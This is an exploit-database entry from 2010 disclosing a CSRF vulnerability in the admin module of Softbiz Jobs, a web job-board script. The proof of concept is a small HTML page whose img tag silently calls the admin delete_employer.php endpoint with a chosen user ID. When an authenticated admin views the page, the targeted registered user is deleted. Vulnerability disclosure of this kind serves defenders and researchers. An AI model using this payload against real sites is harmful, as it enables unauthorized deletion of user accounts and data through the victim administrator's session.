Lucene search
Pratul Agrawal1337DAY-ID-11037HistoryFeb 23, 2010 - 12:00 a.m.
Softbiz Jobs CSRF Vulnerability
2010-02-2300:00:00
Pratul Agrawal
0day.today
12
Exploit for unknown platform in category web applications
===============================
Softbiz Jobs CSRF Vulnerability
===============================
=======================================================================
Softbiz Jobs CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in- Admin module
# company aksitservices
# Credit by Pratul Agrawal
# Download http://www.softbizscripts.com/
# Script softbizscripts
# Proof of concept
Script to delete the registered user through Cross Site request forgery
...................................................................................................................
<html>
<body>
<img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID] />
</body>
</html>
...................................................................................................................
After execution refresh teh page and u can see that user having id=20 get deleted automatically.
#If you have any questions, comments, or concerns, feel free to contact me.
# 0day.today [2018-01-06] #